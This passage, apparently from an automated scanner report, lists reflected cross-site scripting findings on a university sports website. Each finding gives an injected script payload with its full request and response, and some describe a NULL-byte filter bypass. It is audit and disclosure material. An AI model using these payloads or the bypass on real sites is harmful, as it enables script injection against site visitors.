<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/photogallery141e8"><script>alert(1)</script>d67fe75be5d/','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.90. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11ba5"><script>alert(1)</script>fc13649fd00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports11ba5"><script>alert(1)</script>fc13649fd00/m-footbl/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:49 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports11ba5"><script>alert(1)</script>fc13649fd00/m-footbl/9873956','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.91. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f60b2"><script>alert(1)</script>7e2fb4e049d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footblf60b2"><script>alert(1)</script>7e2fb4e049d/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:49 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footblf60b2"><script>alert(1)</script>7e2fb4e049d/9873956','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.92. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30b6e"><script>alert(1)</script>b2282aeecfa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/987395630b6e"><script>alert(1)</script>b2282aeecfa HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:54 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/987395630b6e"><script>alert(1)</script>b2282aeecfa','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.93. http://www.und.com/sports/m-footbl/9873956 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99832"><script>alert(1)</script>82a7a238541 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9873956?99832"><script>alert(1)</script>82a7a238541=1 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:48 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9873956?99832"><script>alert(1)</script>82a7a238541=1','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.94. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0614"><script>alert(1)</script>104a0f6e999 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sportsd0614"><script>alert(1)</script>104a0f6e999/m-footbl/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:01:11 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sportsd0614"><script>alert(1)</script>104a0f6e999/m-footbl/9874134','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.95. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34139"><script>alert(1)</script>b578545b794 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl34139"><script>alert(1)</script>b578545b794/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:01:12 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl34139"><script>alert(1)</script>b578545b794/9874134','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.96. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984d1"><script>alert(1)</script>4b37886c489 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9874134984d1"><script>alert(1)</script>4b37886c489 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:01:14 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9874134984d1"><script>alert(1)</script>4b37886c489','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.97. http://www.und.com/sports/m-footbl/9874134 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88998"><script>alert(1)</script>57c6a7a77bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9874134?88998"><script>alert(1)</script>57c6a7a77bc=1 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:01:10 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9874134?88998"><script>alert(1)</script>57c6a7a77bc=1','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.98. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00172bf"><script>alert(1)</script>a3efd022b7f was submitted in the REST URL parameter 1. This input was echoed as 172bf"><script>alert(1)</script>a3efd022b7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sports%00172bf"><script>alert(1)</script>a3efd022b7f/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:45 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports%00172bf"><script>alert(1)</script>a3efd022b7f/m-footbl/grfx.cstv.com/graphics/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.99. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a3fe9"><script>alert(1)</script>b7e3c097217 was submitted in the REST URL parameter 2. This input was echoed as a3fe9"><script>alert(1)</script>b7e3c097217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sports/m-footbl%00a3fe9"><script>alert(1)</script>b7e3c097217/grfx.cstv.com/schools/nd/graphics/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:46 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl%00a3fe9"><script>alert(1)</script>b7e3c097217/grfx.cstv.com/graphics/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.100. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005370c"><script>alert(1)</script>1fbbb8b68cd was submitted in the REST URL parameter 3. This input was echoed as 5370c"><script>alert(1)</script>1fbbb8b68cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sports/m-footbl/grfx.cstv.com%005370c"><script>alert(1)</script>1fbbb8b68cd/schools/nd/graphics/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:35 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/grfx.cstv.com%005370c"><script>alert(1)</script>1fbbb8b68cd/graphics/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.101. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0036ab8"><script>alert(1)</script>7f13e4a988e was submitted in the REST URL parameter 4. This input was echoed as 36ab8"><script>alert(1)</script>7f13e4a988e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sports/m-footbl/grfx.cstv.com/schools%0036ab8"><script>alert(1)</script>7f13e4a988e/nd/graphics/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:35 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/grfx.cstv.com/schools%0036ab8"><script>alert(1)</script>7f13e4a988e/nd/graphics/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.102. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003477a"><script>alert(1)</script>b5f3b6e1451 was submitted in the REST URL parameter 5. This input was echoed as 3477a"><script>alert(1)</script>b5f3b6e1451 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sports/m-footbl/grfx.cstv.com/schools/nd%003477a"><script>alert(1)</script>b5f3b6e1451/graphics/spacer.gif HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:46 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/grfx.cstv.com/schools/nd%003477a"><script>alert(1)</script>b5f3b6e1451/graphics/spacer.gif','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.103. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
